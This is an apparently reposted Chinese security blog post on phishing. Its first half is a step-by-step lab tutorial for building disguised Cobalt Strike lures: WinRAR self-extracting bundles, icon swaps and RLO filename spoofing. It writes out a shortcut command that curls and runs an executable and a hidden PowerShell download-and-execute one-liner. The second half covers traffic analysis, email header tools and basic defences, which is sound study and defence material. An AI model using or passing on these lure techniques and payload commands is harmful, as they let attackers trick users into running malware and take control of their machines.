走出之前紧张的生活工作压力,最近我听客户讲得最多的东西就是钓鱼。借此机会,我打算整理一份关于网络钓鱼攻击和防守的一些思考。
今年早些时候,发生的Deepfake绑架事件引发热议。事件过程是这样的,一位亚利桑那州的母亲被使用Deepfake技术的犯罪分子欺骗,相信自己的女儿依旧被绑架。犯罪分子通过Deepfake技术克隆了她女儿的声音,然后模拟出哭泣、大喊大叫以及恳求的声音,成功骗取到1万美金。据趋势科技的报告,从TikTok或Facebook等社交媒体平台获取的几秒钟的声音通常足以克隆个人并将其用于恶意目的,包括深度伪造绑架。
网络钓鱼属于一种欺诈形式,网络犯罪的一种,通常攻击者会利用目标对象的信任,将恶意文件投放到目标网络设备上,从而达到窃取敏感数据,甚至控制对方计算机的目的。
一文就学会网络钓鱼“骚”姿势 - 先知社区 (aliyun.com)
红蓝对抗之邮件钓鱼攻击 - 博客 - 腾讯安全应急响应中心 (tencent.com)
RLO的Unicode反转文件后缀钓鱼 | wolke
这里更像是社工。网络钓鱼的流程一般可以分为三步,分别是寻找大鱼、制作鱼饵和抛竿,其中找大鱼、抛竿更加考验安全意识,制作鱼饵相对考验技术。
制作思路:利用Cobalt Strike生成钓鱼木马文件,然后使用WinRAR压缩工具的特性将木马文件和其他常规文件进行捆绑,并实现自动执行解压文件的功能,达到上线的目的。为了提高隐藏木马文件,以及诱惑目标对象点击,使用resourcehacker对其进行图标替换,使用RLO将文件的后缀进行转换伪装。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(2)提前准备图片,使用一张图片,使用WinRAR工具将文件和图片进行捆绑。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
在WinRAR工具中,提供了文件自解压的功能,使得木马文件的执行更加隐蔽。相关配置如下:
设置——解压后运行:E:文件tmppushing.exe;E:文件tmp1691246944258.jpg
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(3)使用resourcehacker更新文件图标,需要提前准备一个Icon,将其图标伪装为图片。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(4)使用RLO,将文件名词的后缀进行反转,将其可执行文件伪装为图片jpg。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(5)最后本地实验,假装目标点击并解压该文件,发现此时CS已经上线。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
制作思路:提前利用Cobalt Strike制作木马文件,并置于http服务目录下;对任意文件创建快捷方式,右键其属性,更改目标以及图标。更改目标,是为了当目标对象点击该快捷方式时,系统运行恶意指令,下载恶意文件并执行;更改图标,是为了更有诱惑力。
(1)使用CS生成钓鱼文件,并将其置于http服务下。这里使用python开启http服务。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(2)选择某一个文件,生成快捷方式,更改其属性中的目标和图标。这里将目标内容更换为:C:WindowsSystem32cmd.exe /k curl http://192.168.6.128:8888/pushing.exe --output E:文件win.exe && E:文件win.exe
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(3)当目标对象点击该快捷方式时,就会下载并执行提前准备好的木马文件。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
3.powershell木马+BAT2EXE+RLO
制作思路:利用Cobalit Strike生成powershell,然后本地新建一个txt.bat文件,之后采用RLO将文件名词反转,伪装成bat.txt文件。此外,也可以在txt.bat文件的顶部写入notepad,当目标对象点击bat.txt时,会正常打开一个txt文件,同时也会自动执行木马文件。
(1)使用CS创建监听,并生成powershell。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.75.128:80/a'))"
(2)本地生成一个txt.bat文件,内容写notepad。当点击该txt.bat文件时,确保能够打开一个记事本。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(3)将powershell语句也写入txt.bat,然后使用BAT2EXE将txt.bat转换为exe文件。为什么要这样呢?是因为当运行bat文件时,powershell命令没有正常运行。那为什么不是直接改后缀呢?你可以试试,本地无法运行。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(4)使用RLO,将txt.exe文件的后缀进行反转。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
(5)点击该文件,发现记事本正常打开,同时恶意文件也已经执行。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
除上述方法外,还有利用powershell、word宏病毒、Excel宏注入、CVE-2017-11882等方法手段来达到制作高质量鱼饵的目的。
在研究鱼饵的相关网络特征时,使用wireshake进行流量抓取。由于本地并没有开启其他服务,所以检索目标流量还是相对容易。就是下面的HTTP流量。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
该流量特征有哪些呢?经过仔细分析,发现该http流量的IP111.206.148.68并不是本地或虚拟机的IP地址。(本地,即被控主机的IP是192.168.75.1,WLAN地址是192.168.0.100,控制台地址是192.168.75.128)。因此这里的111.206.148.68应该是控制台的IP。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
此外,发现当本地点击木马文件时,会主动向控制台的51913发起请求。而在控制台中,开启的监听端口是8888,因此这里的端口也是进行了伪装。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
这里存在一个疑问,控制台和被控主机之间发送的数据具有什么特征呢?由于这里只是抓取的连接流量,发现Lenth分别是182、54、218、54。但是如果产生了恶意操作,那么Lenth一定会变得较大。在这里,我渐渐理解了为什么黑客在传输数据的时候,都会尽量压缩数据的大小,避免被发现。
可惜的是,在数据data中,并没有异常的特征出现。或许当执行恶意操作的时候,能够有所发现。
在本地被控主机端,检查端口,键入命令:netstat -ano|find "51913"
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
发现存在该Https服务,PID为14332。打开资源浏览器,即可发现该进程,并且我发现在这里的进程后缀依旧显示为伪装后缀。可想而知,钓鱼木马的隐藏很深,想要发现还是挺难的。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
由于本地并没有弄注册表、计划任务,所以只能做一些简单的分析。本次主要是采用CS来创建的木马文件,payload大致是利用http、https、dns、smb等服务。其中https,提供加密的功能,在data中被发现的难度较大;smb,属于系统协议,一般是安全管理软件的关注重点。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
钓鱼邮件是钓鱼木马投递的重要形式之一,主要涉及三种协议,分别是SMTP、POP3和IMAP。
其中SMTP,是一种提供可靠且有效的电子邮件传输的协议。SMTP是建立在FTP文件传输服务上的一种邮件服务,主要用于系统之间的邮件信息传递,并提供有关来信的通知。POP3,即邮局协议,用于电子邮件的接收,它使用TCP的110端口。IMAP,交互邮件访问协议(Interactive Mail Access Protocol),是一个应用层协议。
SMTP相对于其他两者协议,更多的侧重点在于发送与中继,与POP、IMAP太多不同;正常情况下只需去考虑POP和IMAP的情况进行解析,因为POP和IMAP对客户是进行实实在在的接收;唯一比较特殊的是SMTP是注重于”推送“而不是”拉取“这是区别于其他两种协议的方式之一,此外,SMTP是明确的在TCP/IP协议簇里,其他两者只是通过TCP/IP协议进行传输。
POP与IMAP主要区别就在于,POP是单一的离线模式对邮件进行传输,IMAP是在线和离线两种模式对邮件进行传输,
在HW过程中,攻击者通常通过群发邮件,然后通过查看回执,来确认钓鱼目标。
标头字段主要有发件人、主题、发送时间、收件人等,这部分的内容是可以伪造的。正文内容有纯文本或HTML格式。在正文中,可能还存在附件。这些内容都是可以伪造的。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
常见的钓鱼邮件,主要有垃圾邮件、网络钓鱼、鱼叉攻击、捕鲸等类型。
对于一些不清楚的恶意邮件,可以使用交互式在线分析沙箱进行分析。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
在分析研判过程中,需要提前备份钓鱼邮件的原文、正文和附件,然后对邮件的原文消息头以及IP、URL、附件进行分析。
消息头分析的工具:工具一:https://toolbox.googleapps.com/apps/main/工具二:https://mha.azurewebsites.net/工具三:https://mailheader.org/IP地址分析工具:https://ipinfo.io/网站扫描与分析工具:https://urlscan.io/其他IP或URL工具:https://www.url2png.com/https://www.wannabrowser.net/https://talosintelligence.com/reputationhttps://phishtank.com/?https://www.spamhaus.org/https://mxtoolbox.com/邮件原文URL提取器https://www.convertcsv.com/url-extractor.htm https://gchq.github.io/CyberChef/ 的 Extract URLs恶意附件SHA256的分析网站https://talosintelligence.com/talos_file_reputationhttps://www.virustotal.com/gui/恶意软件沙箱https://app.any.run/https://www.hybrid-analysis.com/https://www.joesecurity.org/
此外还应该注意专门针对不明邮件的回复语,避免直接成为攻击者的钓鱼目标。
1、自动开启本地安全管理系统,及时升级,配置本地安全基线。
![关于钓鱼的一点思考]( "关于钓鱼的一点思考")
2、提升安全意识,了解必要的钓鱼话术,避免上当。
3、管理重要敏感数据,避免数据泄露或窃取。
原文始发于微信公众号(星耀安全实验室):关于钓鱼的一点思考
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
http://cn-sec.com/archives/2007524.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论